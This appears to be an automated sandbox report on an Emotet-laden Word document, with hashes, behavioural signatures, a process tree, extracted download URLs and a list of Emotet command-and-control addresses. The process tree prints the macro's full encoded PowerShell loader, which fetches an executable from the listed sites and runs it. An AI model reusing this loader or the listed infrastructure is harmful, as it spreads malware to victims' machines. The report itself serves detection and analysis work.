Analysis
-
max time kernel
135s -
max time network
150s -
platform
windows10_x64 -
resource
win10 -
submitted
01-08-2020 19:37
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.12932.19584.10385.doc
Resource
win7
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.12932.19584.10385.doc
-
Size
169KB
-
MD5
ad4dab090e9db1de2ce2972440becfa5
-
SHA1
f5bce1285800898458044ff22dd93e5795a5e92e
-
SHA256
58c574f8ab938e878c2d66861aa38821876dcb5a156c46ac9985a8b59f97bb8c
-
SHA512
87f4d9f18704cdfa8ff11610ef5ed945cb2b68a9c48ccebea363b29b10d1d8f8ecc0ffe4d13c3856c9be6ed6e9d811d7da3d0b613f7b06a4ef56f4eb4d3c96ce
Malware Config
Extracted
http://mktf.mx/wp-includes/nf_p0w_z87k/
http://dragonfang.com/nav/pu_4cz89_3e81ooa90c/
http://maxiquim.cl/cgi-bin/qa0_i_qzk/
https://www.planetkram.com/egherdbaseball/z_xu00_9hbk939elw/
http://meulocal.com.br/suspend-page/0e_wt5bq_ekn/
Extracted
emotet
142.105.151.124:443
62.108.54.22:8080
212.51.142.238:8080
71.208.216.10:80
108.48.41.69:80
83.110.223.58:443
210.165.156.91:80
104.131.44.150:8080
104.236.246.93:8080
5.39.91.110:7080
209.141.54.221:8080
209.182.216.177:443
153.126.210.205:7080
91.211.88.52:7080
180.92.239.110:8080
183.101.175.193:80
162.241.92.219:8080
87.106.139.101:8080
114.146.222.200:80
65.111.120.223:80
113.160.130.116:8443
190.160.53.126:80
62.75.141.82:80
46.105.131.87:80
203.153.216.189:7080
46.105.131.79:8080
91.231.166.124:8080
81.2.235.111:8080
189.212.199.126:443
95.9.185.228:443
169.239.182.217:8080
47.153.182.47:80
116.203.32.252:8080
139.130.242.43:80
75.139.38.211:80
41.60.200.34:80
47.144.21.12:443
103.86.49.11:8080
95.179.229.244:8080
173.91.22.41:80
70.167.215.250:8080
110.145.77.103:80
85.59.136.180:8080
5.196.74.210:8080
24.234.133.205:80
76.27.179.47:80
104.131.11.150:443
87.106.136.232:8080
61.19.246.238:443
201.173.217.124:443
176.111.60.55:8080
200.55.243.138:8080
74.208.45.104:8080
139.59.60.244:8080
67.241.24.163:8080
24.43.99.75:80
93.51.50.171:8080
109.74.5.95:8080
137.59.187.107:8080
37.139.21.175:8080
157.245.99.39:8080
124.45.106.173:443
47.146.117.214:80
95.213.236.64:8080
62.138.26.28:8080
190.55.181.54:443
24.179.13.119:80
152.168.248.128:443
222.214.218.37:4143
168.235.67.138:7080
181.230.116.163:80
121.124.124.40:7080
79.98.24.39:8080
37.187.72.193:8080
162.154.38.103:80
78.24.219.147:8080
200.41.121.90:80
185.94.252.104:443
50.116.86.205:8080
Signatures
-
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/364-10-0x00000000006C0000-0x00000000006CC000-memory.dmp emotet behavioral2/memory/364-10-0x00000000006C0000-0x00000000006CC000-memory.dmp emotet behavioral2/memory/1336-13-0x0000000000660000-0x000000000066C000-memory.dmp emotet behavioral2/memory/1336-13-0x0000000000660000-0x000000000066C000-memory.dmp emotet -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Drops file in System32 directory 1 IoCs
Processes:
14.exedescription ioc process File opened for modification C:\Windows\SysWOW64\sechost\Apphlpdm.exe 14.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 2324 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powersheLL.exeApphlpdm.exepid process 2324 powersheLL.exe 2324 powersheLL.exe 2324 powersheLL.exe 1336 Apphlpdm.exe 1336 Apphlpdm.exe 1336 Apphlpdm.exe 1336 Apphlpdm.exe -
Executes dropped EXE 2 IoCs
Processes:
14.exeApphlpdm.exepid process 364 14.exe 1336 Apphlpdm.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 15 2324 powersheLL.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
14.exedescription pid process target process PID 364 wrote to memory of 1336 364 14.exe Apphlpdm.exe PID 364 wrote to memory of 1336 364 14.exe Apphlpdm.exe PID 364 wrote to memory of 1336 364 14.exe Apphlpdm.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
WINWORD.EXE14.exeApphlpdm.exepid process 3100 WINWORD.EXE 3100 WINWORD.EXE 3100 WINWORD.EXE 3100 WINWORD.EXE 3100 WINWORD.EXE 3100 WINWORD.EXE 3100 WINWORD.EXE 3100 WINWORD.EXE 3100 WINWORD.EXE 3100 WINWORD.EXE 3100 WINWORD.EXE 364 14.exe 1336 Apphlpdm.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3100 WINWORD.EXE 3100 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2324 3956 powersheLL.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.12932.19584.10385.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABWAEcASgBLAFgAbQB4AGUAPQAnAEQARQBWAFIAVgB4AGgAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBgAEkAdAB5AHAAcgBvAHQAbwBjAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEwASwBGAFIATQBkAHAAZAAgAD0AIAAnADEANAAnADsAJABBAEEASABOAFkAYgBuAGgAPQAnAFQAQgBNAE8AQgBhAGcAZwAnADsAJABGAFoAUgBWAEkAdQBtAHMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASwBGAFIATQBkAHAAZAArACcALgBlAHgAZQAnADsAJABWAEMARQBYAEUAbQBpAG8APQAnAFQATwBIAEsAWQBkAHEAYwAnADsAJABJAFoASwBYAEsAdwBzAHoAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAYwBsAGkAZQBOAHQAOwAkAFYASQBDAFoAUgBzAHkAcgA9ACcAaAB0AHQAcAA6AC8ALwBtAGsAdABmAC4AbQB4AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbgBmAF8AcAAwAHcAXwB6ADgANwBrAC8AKgBoAHQAdABwADoALwAvAGQAcgBhAGcAbwBuAGYAYQBuAGcALgBjAG8AbQAvAG4AYQB2AC8AcAB1AF8ANABjAHoAOAA5AF8AMwBlADgAMQBvAG8AYQA5ADAAYwAvACoAaAB0AHQAcAA6AC8ALwBtAGEAeABpAHEAdQBpAG0ALgBjAGwALwBjAGcAaQAtAGIAaQBuAC8AcQBhADAAXwBpAF8AcQB6AGsALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAbABhAG4AZQB0AGsAcgBhAG0ALgBjAG8AbQAvAGUAZwBoAGUAcgBkAGIAYQBzAGUAYgBhAGwAbAAvAHoAXwB4AHUAMAAwAF8AOQBoAGIAawA5ADMAOQBlAGwAdwAvACoAaAB0AHQAcAA6AC8ALwBtAGUAdQBsAG8AYwBhAGwALgBjAG8AbQAuAGIAcgAvAHMAdQBzAHAAZQBuAGQALQBwAGEAZwBlAC8AMABlAF8AdwB0ADUAYgBxAF8AZQBrAG4ALwAnAC4AIgBTAGAAUABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE4AVABMAEkASwBlAGcAawA9ACcAUgBRAFUAUgBQAHIAYgBzACcAOwBmAG8AcgBlAGEAYwBoACgAJABMAE8AUABEAEUAcwBiAG4AIABpAG4AIAAkAFYASQBDAFoAUgBzAHkAcgApAHsAdAByAHkAewAkAEkAWgBLAFgASwB3AHMAegAuACIARABvAHcAbgBgAEwAYABPAEEAZABgAEYASQBMAEUAIgAoACQATABPAFAARABFAHMAYgBuACwAIAAkAEYAWgBSAFYASQB1AG0AcwApADsAJABUAEMAVgBWAEUAawBnAHQAPQAnAEkASgBDAEoAWAB5AGkAcwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEYAWgBSAFYASQB1AG0AcwApAC4AIgBsAGAAZQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgA5ADYAMAA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAGAAUgBFAGEAYABUAEUAIgAoACQARgBaAFIAVgBJAHUAbQBzACkAOwAkAE4AUgBBAFEAVABmAHEAeAA9ACcAQwBaAFEASgBHAGUAeAB6ACcAOwBiAHIAZQBhAGsAOwAkAFMATwBCAEIAUQBtAHkAYgA9ACcASQBUAFYASgBXAGUAZwBmACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQATABDAFAATgBtAGYAcgA9ACcAUwBaAFcARQBBAHkAbABhACcA1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
-
C:\Users\Admin\14.exeC:\Users\Admin\14.exe1⤵
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\sechost\Apphlpdm.exe"C:\Windows\SysWOW64\sechost\Apphlpdm.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\14.exe
-
C:\Users\Admin\14.exe
-
C:\Windows\SysWOW64\sechost\Apphlpdm.exe
-
memory/364-10-0x00000000006C0000-0x00000000006CC000-memory.dmpFilesize
48KB
-
memory/1336-13-0x0000000000660000-0x000000000066C000-memory.dmpFilesize
48KB
-
memory/1336-11-0x0000000000000000-mapping.dmp
-
memory/3100-3-0x000001358E9E0000-0x000001358E9F1000-memory.dmpFilesize
68KB
-
memory/3100-7-0x000001358EBA7000-0x000001358EBAA000-memory.dmpFilesize
12KB
-
memory/3100-6-0x000001358EBAA000-0x000001358EBAF000-memory.dmpFilesize
20KB
-
memory/3100-5-0x000001358EBA7000-0x000001358EBAA000-memory.dmpFilesize
12KB
-
memory/3100-0-0x000001358E9E0000-0x000001358E9F1000-memory.dmpFilesize
68KB
-
memory/3100-2-0x000001358E9E0000-0x000001358E9F1000-memory.dmpFilesize
68KB
-
memory/3100-1-0x000001358E9E0000-0x000001358E9F1000-memory.dmpFilesize
68KB